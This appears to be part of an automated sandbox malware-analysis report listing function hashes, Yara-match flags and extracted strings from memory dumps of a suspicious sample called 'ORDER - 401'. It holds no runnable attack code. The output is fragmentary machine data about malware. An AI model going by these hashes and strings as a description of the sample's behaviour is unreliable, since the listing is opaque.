                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 3e2ddbdefb5aa0b57140d7b0c123a94501964644292d3249d70f367482ffad41
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
                                                                                  • Instruction ID: 0a2599ca3d280801e8494a088ba5bddecf481767e5b86a5b93612f4e820edf82
                                                                                  • Opcode Fuzzy Hash: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
                                                                                  • Instruction Fuzzy Hash: 3951C5B5A04156FEDB61DB9C899097FFBF8BF08240B14816AF8E5D7641D334DE408BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
                                                                                  • Instruction ID: 589714183ab9518764b3953240c9fa6b079dcc0baa3b78d5beccd7f24751f0c8
                                                                                  • Opcode Fuzzy Hash: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
                                                                                  • Instruction Fuzzy Hash: 0E511671A00646AFDB31DF5CC89097FFBF8EF54600B04849EE4D6C7A81EA74DA408B60
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01084725
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01084787
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01084742
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010846FC
                                                                                  • Execute=1, xrefs: 01084713
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01084655
                                                                                  • ExecuteOptions, xrefs: 010846A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010802BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010802E7
                                                                                  • RTL: Re-Waiting, xrefs: 0108031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 01087B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01087B7F
                                                                                  • RTL: Re-Waiting, xrefs: 01087BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0108728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 010872A3
                                                                                  • RTL: Re-Waiting, xrefs: 010872C1
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01087294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: /$ R$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${z
                                                                                  • API String ID: 0-2491054771
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$O$S$\$s
                                                                                  • API String ID: 0-3854637164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -G$Lf
                                                                                  • API String ID: 0-1055479412
                                                                                  • Instruction Fuzzy Hash: 64111FB6D0121CAF9B05DFA9D8409EEB7FDEF48210F14456EE919E7200E7705A018FE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b836eaca9ddf881c2266d9e59ce918a6b6ace5c2e360bebbbbd0fc7e980b3d1a
                                                                                  • Instruction ID: e9639551dae9d3443285cbc7b15e2ed0b60f1b11f452e8abef8744175eec7eda
                                                                                  • Opcode Fuzzy Hash: b836eaca9ddf881c2266d9e59ce918a6b6ace5c2e360bebbbbd0fc7e980b3d1a
                                                                                  • Instruction Fuzzy Hash: 4E01F762D061046AEF10AAA0DC49FAB737DDB44710F004A95FC09B2140E774A7518BA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction ID: 0bbf13b509f9133d4c5caacfe729ea88130b9bcd6784c3df989f8b501bfdcb05
                                                                                  • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction Fuzzy Hash: DF0184B2214518BBCB44DE99DC81EDB77ADEF8C714F518108BA09A7241D630E8518BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7781e152f5116b5491ad1db327c5b8f095cd3bf8fa93476254c5b6e3a3a10b7
                                                                                  • Instruction ID: bae1d808e60f5f635aa67d02ca53cfaec71437c0409f355d23b3027aa020bb7e
                                                                                  • Opcode Fuzzy Hash: d7781e152f5116b5491ad1db327c5b8f095cd3bf8fa93476254c5b6e3a3a10b7
                                                                                  • Instruction Fuzzy Hash: D001D7F2D01229AFDB45DFE8D8409EEBBF9AB18700F14456EE915F2240E77056048FA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5458a291c20a3af9e9ae532c644e0288b42cb6c9a9169dc4310d2c4bebb472d3
                                                                                  • Instruction ID: 20b76de033a432934c88f0663bc5ad25bddbebf9e094ed0da32691c3afb4cb88
                                                                                  • Opcode Fuzzy Hash: 5458a291c20a3af9e9ae532c644e0288b42cb6c9a9169dc4310d2c4bebb472d3
                                                                                  • Instruction Fuzzy Hash: 6EF02BB360421657D7101A7DAC45B9AF79CEB85338F34122AFD1CD6281E731D4118790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                                  • Instruction ID: b98a0193b97d979ae90bc4eb11a48b445ec7ccc037da57afcfbb9f5cc884e533
                                                                                  • Opcode Fuzzy Hash: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                                  • Instruction Fuzzy Hash: 0BF08CB1200218BFCB10DF98DC81EDB77ADEFC8710F108019FA08A7241D630B8118BB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                                  • Instruction ID: aca740408b79684eb2a75660b1400b2bfa3e24302724a934db2804d89e6401c8
                                                                                  • Opcode Fuzzy Hash: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                                  • Instruction Fuzzy Hash: C3E06837408A2746C3021A786842045F791FA8133A338A31EE86B97241DB32A84986C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction ID: 90153b0473f8ceae06432c68020921cbc434e27553124723b2c187abab0da777
                                                                                  • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction Fuzzy Hash: 35E09275204204BFD610EE58DC45EDB33ADDFC5710F400418FA08A7281C631BA11CBB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                                  • Instruction ID: b0b26f0d6c6898e1d73d3f1254efd4e330ed7fffc2c375b33501f2637d3ba09e
                                                                                  • Opcode Fuzzy Hash: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                                  • Instruction Fuzzy Hash: E3F08271815208EBDB14CF74D841BDEBBB4EB04320F2083AEE8299B280D63497508B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                                  • Instruction ID: 86b347ffc5a73adeaa33d0a5b7966bf4a7929ecdb14c7c9086c85d4047be2cda
                                                                                  • Opcode Fuzzy Hash: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                                  • Instruction Fuzzy Hash: 8DE02632F0425433C221258A8C09F9B735ECBC1E60F0801A9FF0C9B300E2B0B90186E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction ID: bd92810a91b93d36bd4ae324fd5b33d4d5abf518a82cb7b9417fdd3083d3f4f3
                                                                                  • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction Fuzzy Hash: BCE0D6362002047BC620AA69CC40FDBB7ACDFC2B11F400818FA08AB282C6B0B8018BB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                                  • Instruction ID: 783642aaa6e225f5a376499f618b1efc6ad8721d5774de73790f79ae4aacbf35
                                                                                  • Opcode Fuzzy Hash: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                                  • Instruction Fuzzy Hash: 68D0A573414573454715167C2C55444D7C5D28133D37C373AE46DD6291EB21C05A43D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 97f3ac0a48ec897062dc0fb3bb2a1d549dcfbe4f789441e559fc9331e0c57e5f
                                                                                  • Instruction ID: 0bb5732293d82fef1054953ecea887d4b019f7f9c8031629eb049c226131282d
                                                                                  • Opcode Fuzzy Hash: 97f3ac0a48ec897062dc0fb3bb2a1d549dcfbe4f789441e559fc9331e0c57e5f
                                                                                  • Instruction Fuzzy Hash: 23E02B36515048AAE701CF70C860FEEB738EB40300F0447E9EC0587500D23A8751C651
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5197b9f4753733361b288f5139756fe0d3e1b7947f54454737712bbb4051830
                                                                                  • Instruction ID: e8c19a1afdec106b908aa76500a11629acbb275011fa6539b851c1d1b5d55bf6
                                                                                  • Opcode Fuzzy Hash: f5197b9f4753733361b288f5139756fe0d3e1b7947f54454737712bbb4051830
                                                                                  • Instruction Fuzzy Hash: 3DB01292B455D6137F3F323A224C45ABE2748D31F07D606A0F84EAF2CFDBA288636541
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: /$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${
                                                                                  • API String ID: 0-808712017
                                                                                  • Opcode ID: 675b8b416705f6fbc1a036a5d72e4af9b6201caacaeb349fe94eaaf066658d88
                                                                                  • Instruction ID: 2a42437629f950d50cd38afdf1b95b03069a7fdc8ac3f7314cf8db895741ec49
                                                                                  • Opcode Fuzzy Hash: 675b8b416705f6fbc1a036a5d72e4af9b6201caacaeb349fe94eaaf066658d88
                                                                                  • Instruction Fuzzy Hash: 3FC108B0D05669CBEB60CF41C9987DEBBB1BB45308F1085D9C5583B281CBBA1AC9CF95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                  • API String ID: 0-3311200144
                                                                                  • Opcode ID: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                                  • Instruction ID: 38abec255c30477170fab103ce5eb6988a8935884596138a0cd35d61767d3c5e
                                                                                  • Opcode Fuzzy Hash: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                                  • Instruction Fuzzy Hash: AF21E8B4C053989BCF24DF95EA8269CBF30FB05704F20A248D9143F215D7760A85CF9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                  • API String ID: 0-392141074
                                                                                  • Opcode ID: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                                  • Instruction ID: 7c08def50d99711999a5751f43a62967663c73e3e5a0b77f24d55aaa45c908f7
                                                                                  • Opcode Fuzzy Hash: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                                  • Instruction Fuzzy Hash: 04711CB1C1421CBADB16DBA4CC45FEEB7BDBF48700F04459DE619A6280EB7157488FA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                  • API String ID: 0-620024284
                                                                                  • Opcode ID: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                                  • Instruction ID: 59b342c71bb662b8683c2bbca14914e38fa71c893888b5956d0a00a91e8a40ff
                                                                                  • Opcode Fuzzy Hash: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                                  • Instruction Fuzzy Hash: C141A5B5C10258BADB21EBA4CC44FDE737DAF54700F4085DDA60DA7240EBB597498FA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4p{+$F$P$T$f$r$x
                                                                                  • API String ID: 0-3640315310
                                                                                  • Opcode ID: c1c30268e2cee8911cb1ae7d7d93b517b15105d1356dc427dfa2868c86aea493
                                                                                  • Instruction ID: 6f4bff885f5185da8d6b72ee6e4c16a4dbbad1bed39d6af51d86d032d5900249
                                                                                  • Opcode Fuzzy Hash: c1c30268e2cee8911cb1ae7d7d93b517b15105d1356dc427dfa2868c86aea493
                                                                                  • Instruction Fuzzy Hash: 0B510370900304AAEF35DB64CC48BEBB7FDBF09704F00465EE909A7181E7B4A648CBA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                  • API String ID: 0-3322591375
                                                                                  • Opcode ID: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                                  • Instruction ID: ce7d58abde2b6ae386169404e4d22798403feab92d2fb93714895f2a75df6d35
                                                                                  • Opcode Fuzzy Hash: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                                  • Instruction Fuzzy Hash: D441A7B2C14218AECF50DF99DC88BEEB7F9EF48300F01465AD909A7240EB7156458FA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (HD$(HD$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                  • API String ID: 0-2079321013
                                                                                  • Opcode ID: 6f9d26bba0c40047bb727c5965690cfdff11a2aa1a96a300ae123d5619025ecd
                                                                                  • Instruction ID: 43590aaca965a7097be7790c1af9bcb0738c5d09636cf655a799cf0f2f04fb0a
                                                                                  • Opcode Fuzzy Hash: 6f9d26bba0c40047bb727c5965690cfdff11a2aa1a96a300ae123d5619025ecd
                                                                                  • Instruction Fuzzy Hash: 3C4173719551987EEB02EB90CC45FEF777DAF55710F404548FA047A280E7746A018BB6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $i$l$o$u
                                                                                  • API String ID: 0-2051669658
